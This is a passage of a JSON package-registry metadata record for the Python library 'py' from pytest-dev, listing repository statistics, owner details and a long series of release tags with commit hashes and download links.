{"id":5575,"name":"py","ecosystem":"pip","repository_url":"https://github.com/pytest-dev/py","issues_count":93,"created_at":"2025-06-06T19:07:22.366Z","updated_at":"2025-06-06T19:07:22.366Z","purl":"pkg:pypi/py","metadata":{"id":2863985,"name":"py","ecosystem":"pypi","description":"library with cross-python path, ini-parsing, io, code, log facilities","homepage":"https://py.readthedocs.io/","licenses":"MIT license","normalized_licenses":["MIT"],"repository_url":"https://github.com/pytest-dev/py","keywords_array":[],"namespace":null,"versions_count":65,"first_release_published_at":"2023-08-21T22:20:47.434Z","latest_release_published_at":"2021-11-04T17:17:00.000Z","latest_release_number":"1.11.0","last_synced_at":"2025-06-06T00:12:37.685Z","created_at":"2022-04-10T12:09:03.391Z","updated_at":"2025-06-06T00:12:37.685Z","registry_url":"https://pypi.org/project/py/","install_command":"pip install py --index-url https://pypi.org/simple","documentation_url":"https://py.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":["Development Status :: 6 - Mature","Intended Audience :: Developers","License :: OSI Approved :: MIT License","Operating System :: MacOS :: MacOS X","Operating System :: Microsoft :: Windows","Operating System :: POSIX","Programming Language :: Python","Programming Language :: Python :: 2","Programming Language :: Python :: 2.7","Programming Language :: Python :: 3","Programming Language :: Python :: 3.10","Programming Language :: Python :: 3.5","Programming Language :: Python :: 3.6","Programming Language :: Python :: 3.7","Programming Language :: Python :: 3.8","Programming Language :: Python :: 3.9","Programming Language :: Python :: Implementation :: CPython","Programming Language :: Python :: Implementation :: PyPy","Topic :: Software Development :: Libraries","Topic :: Software Development :: Testing","Topic :: Utilities"],"normalized_name":"py"},"repo_metadata":{"id":13153889,"uuid":"68434790","full_name":"pytest-dev/py","owner":"pytest-dev","description":"Python development support library (note: maintenance only)","archived":false,"fork":false,"pushed_at":"2023-06-19T11:28:06.000Z","size":22004,"stargazers_count":68,"open_issues_count":14,"forks_count":106,"subscribers_count":17,"default_branch":"master","last_synced_at":"2024-09-18T00:26:22.983Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pytest-dev.png","metadata":{"files":{"readme":"README.rst","changelog":"CHANGELOG.rst","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":"AUTHORS","dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-09-17T05:55:51.000Z","updated_at":"2024-09-17T01:03:19.000Z","dependencies_parsed_at":"2024-06-18T14:43:51.973Z","dependency_job_id":null,"html_url":"https://github.com/pytest-dev/py","commit_stats":{"total_commits":2439,"total_committers":67,"mean_commits":36.40298507462686,"dds":0.5776957769577695,"last_synced_commit":"6b219734fcd8d2f6489c2f50585a435b34c029c2"},"previous_names":[],"tags_count":61,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pytest-dev","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":219744526,"owners_count":16536675,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pytest-dev","name":"pytest-dev","uuid":"8897583","kind":"organization","description":"","email":"pytest-dev@python.org","website":"https://pytest.org","location":"Everywhere","twitter":"pytestdotorg","company":null,"icon_url":"https://avatars.githubusercontent.com/u/8897583?v=4","repositories_count":71,"last_synced_at":"2024-04-16T03:10:10.569Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/pytest-dev","funding_links":[],"total_stars":30631,"followers":399,"following":0,"created_at":"2022-11-02T16:22:53.846Z","updated_at":"2024-04-16T03:10:29.747Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pytest-dev","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pytest-dev/repositories"},"tags":[{"name":"1.11.0","sha":"447bac514febbb5433963582103d48bb27b3db17","kind":"commit","published_at":"2021-11-04T17:11:50.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.11.0","html_url":"https://github.com/pytest-dev/py/releases/tag/1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.11.0/manifests"},{"name":"1.10.0","sha":"e5ff378fc3bd3f7c366dec769a718bdb1ceca1f1","kind":"tag","published_at":"2020-12-12T12:08:49.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.10.0","html_url":"https://github.com/pytest-dev/py/releases/tag/1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.10.0/manifests"},{"name":"1.9.0","sha":"b344f5b51fd3ec260d180d93e43b4796f1da57b9","kind":"commit","published_at":"2020-06-24T22:44:19.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.9.0","html_url":"https://github.com/pytest-dev/py/releases/tag/1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.9.0/manifests"},{"name":"1.8.2","sha":"d2d5e27862d26d54740bcfc0b0a352ed5b2ee281","kind":"commit","published_at":"2020-06-15T12:26:48.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.8.2","html_url":"https://github.com/pytest-dev/py/releases/tag/1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.8.2/manifests"},{"name":"1.8.1","sha":"8cec6884b053697f90e901fc7692304d3daee7b8","kind":"commit","published_at":"2019-12-27T11:46:02.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.8.1","html_url":"https://github.com/pytest-dev/py/releases/tag/1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.8.1/manifests"},{"name":"1.8.0","sha":"03413d510a702fbaec64cdfb8ea1f5cb618f897e","kind":"commit","published_at":"2019-02-22T01:13:14.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.8.0","html_url":"https://github.com/pytest-dev/py/releases/tag/1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.8.0/manifests"},{"name":"1.7.0","sha":"79e136934e58f341da164b7beb67336a31c2e9df","kind":"commit","published_at":"2018-10-11T16:22:31.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.7.0","html_url":"https://github.com/pytest-dev/py/releases/tag/1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.7.0/manifests"},{"name":"1.6.0","sha":"54d0171725b1b7821da8f586e5aa86c1e5fbb969","kind":"commit","published_at":"2018-08-27T14:20:48.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.6.0","html_url":"https://github.com/pytest-dev/py/releases/tag/1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.6.0/manifests"},{"name":"1.5.4","sha":"7ad4bd7abce534b91392edfeff9bf601b844226f","kind":"commit","published_at":"2018-06-27T01:18:23.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.5.4","html_url":"https://github.com/pytest-dev/py/releases/tag/1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.5.4/manifests"},{"name":"1.5.3","sha":"72445a9d0dc9081d8ac5eb7c5411d31cb100af84","kind":"commit","published_at":"2018-03-22T09:00:40.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.5.3","html_url":"https://github.com/pytest-dev/py/releases/tag/1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.5.3/manifests"},{"name":"1.5.2","sha":"84888f75de0502aece3c1306802b26848e84c5b1","kind":"commit","published_at":"2017-11-15T17:42:12.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.5.2","html_url":"https://github.com/pytest-dev/py/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"9fe072ab22cb1d2d93a64c5275ee1c510d5703bb","kind":"commit","published_at":"2017-11-15T11:38:47.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.5.1","html_url":"https://github.com/pytest-dev/py/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.5.1/manifests"},{"name":"1.5.0","sha":"15137f404c0fdb64f26063dc9fca642fcd625e6e","kind":"commit","published_at":"2017-11-14T20:51:08.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.5.0","html_url":"https://github.com/pytest-dev/py/releases/tag/1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.5.0/manifests"},{"name":"1.4.34","sha":"765b42a8f23f53233c2d11c3de5cfe8b3efccbb4","kind":"commit","published_at":"2017-05-17T06:58:44.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.34","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.34","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.34/manifests"},{"name":"1.4.33","sha":"8699a97d2c9ecfb5b19201e3e961a6615e6a369d","kind":"commit","published_at":"2017-03-16T00:45:51.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.33","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.33","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.33/manifests"},{"name":"1.4.32","sha":"7bd5aee57cab4193f3ce85d727e4932ca994d910","kind":"commit","published_at":"2016-12-16T16:00:56.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.32","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.32","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.32/manifests"},{"name":"1.4.31","sha":"902a83c87f34a2819327dc2cdf109f38652c073f","kind":"commit","published_at":"2015-11-27T20:51:14.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.31","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.31","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.31/manifests"},{"name":"1.4.30","sha":"aa589bf83b66f9f864bbf122432ca45a64e8b81f","kind":"commit","published_at":"2015-06-26T10:28:21.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.30","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.30","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.30/manifests"},{"name":"1.4.29","sha":"61aba82f750d4f00c0a68a846a560c5c2457e861","kind":"commit","published_at":"2015-06-22T20:08:17.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.29","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.29","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.29/manifests"},{"name":"1.4.28","sha":"ab896fa6b771f277d904bb73b1e233885ee2e919","kind":"commit","published_at":"2015-05-22T06:29:54.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.28","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.28","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.28/manifests"},{"name":"1.4.27","sha":"b76f82c0b624b9e982da004274930e650885fc85","kind":"commit","published_at":"2015-05-21T20:37:56.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.27","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.27","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.27/manifests"},{"name":"1.4.26","sha":"6095c80531da78b0b3279c00162c7d4d1488a169","kind":"commit","published_at":"2014-10-24T13:10:29.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.26","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.26","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.26/manifests"},{"name":"1.4.25","sha":"2cb8d50b07f16ba6d8accf6f5b2852f34d38904d","kind":"commit","published_at":"2014-09-24T11:36:26.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.25","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.25","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.25/manifests"},{"name":"1.4.24","sha":"977f77320725aec47c468b35fef0554962fa98e5","kind":"commit","published_at":"2014-09-05T10:57:10.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.24","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.24","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.24/manifests"},{"name":"1.4.23","sha":"8ccc1be1f87bb3c3d827065ec00a89fe41370d23","kind":"commit","published_at":"2014-08-04T11:16:34.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.23","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.23","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.23/manifests"},{"name":"1.4.21","sha":"f9e8a54a2f1145b107d438f9b80ea424130ebb6f","kind":"commit","published_at":"2014-07-14T12:55:06.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.21","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.21","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.21/manifests"},{"name":"1.4.20","sha":"68951e7271b45e023f752268ad85ff1d15b3a84e","kind":"commit","published_at":"2014-01-29T12:17:03.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.20","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.20","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.20/manifests"},{"name":"1.4.19","sha":"5778703127b40be00a75a4694e30c99bf989c0a7","kind":"commit","published_at":"2013-12-12T11:06:57.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.19","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.19","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.19/manifests"},{"name":"1.4.18","sha":"bffa44265fa4f8566476b8d0e875db349f604825","kind":"commit","published_at":"2013-10-29T10:34:13.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.18","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.18","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.18/manifests"},{"name":"1.4.17","sha":"c150fbf9a328839c739454d90b36e94651ad42be","kind":"commit","published_at":"2013-10-03T15:44:21.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.17","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.17","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.17/manifests"},{"name":"1.4.16","sha":"f5288b3213adf65da889eb11f821938d64fcb369","kind":"commit","published_at":"2013-10-01T08:42:40.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.16","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.16","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.16/manifests"},{"name":"1.4.15","sha":"8db9a71edfba77bb966644218585bb8cba40eeeb","kind":"commit","published_at":"2013-06-21T14:38:07.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.15","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.15/manifests"},{"name":"1.4.14","sha":"ef6023b9e4be0f0bb15646c9188887370d3487f6","kind":"commit","published_at":"2013-05-07T08:55:13.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.14","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.14/manifests"},{"name":"1.4.13","sha":"7ca1995230eb5ce132c5e0353d6a62d7774723fc","kind":"commit","published_at":"2013-02-22T11:27:48.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.13","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.13/manifests"},{"name":"1.4.12","sha":"5931241958c9fa6503a4bd694393afe4d28b32f4","kind":"commit","published_at":"2012-11-06T13:48:41.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.12","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.12/manifests"},{"name":"1.4.11","sha":"c3381eb4aab831bfbfbcabd720b67e54b15009bf","kind":"commit","published_at":"2012-10-25T11:14:31.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.11","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.11/manifests"},{"name":"1.4.10","sha":"284a5f81f0f4c32b87a9d924b2efdbcec1792e42","kind":"commit","published_at":"2012-10-19T08:52:12.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.10","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.10/manifests"},{"name":"1.4.9","sha":"213c5e21d4fb9b4991d05aa575031f60efad3b2e","kind":"commit","published_at":"2012-06-12T10:34:19.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.9","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.9/manifests"},{"name":"1.4.7","sha":"42cf2b072bfc0c9869eb7db4baa2b17da3699106","kind":"commit","published_at":"2012-02-06T12:42:31.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.7","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.7/manifests"},{"name":"1.4.6","sha":"045f05e53f613ecc878eff95fdd69d47c0c655e6","kind":"commit","published_at":"2011-12-16T10:36:14.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.6","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.6/manifests"},{"name":"1.4.4","sha":"9f712ed461380f3b007b20776136c81a6e65916c","kind":"commit","published_at":"2011-07-09T08:08:27.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.4","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.4/manifests"},{"name":"1.4.3","sha":"8e2ee38816bf357b6b1991bf245de13efe6879a9","kind":"commit","published_at":"2011-04-17T19:56:55.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.3","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.3/manifests"},{"name":"1.4.2","sha":"4191fe0126d6eb46c53eee3cc10c782d7279d540","kind":"commit","published_at":"2011-03-09T12:52:30.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1.4.2","html_url":"https://github.com/pytest-dev/py/releases/tag/1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pytest-dev%2Fpy/tags/1.4.2/manifests"},{"name":"1.4.1","sha":"1c90b194e77adc22c401b3c4fc2f641829116e83","kind":"commit","published_at":"2011-02-07T10:27:20.000Z","download_url":"https://codeload.github.com/pytest-dev/py/tar.gz/1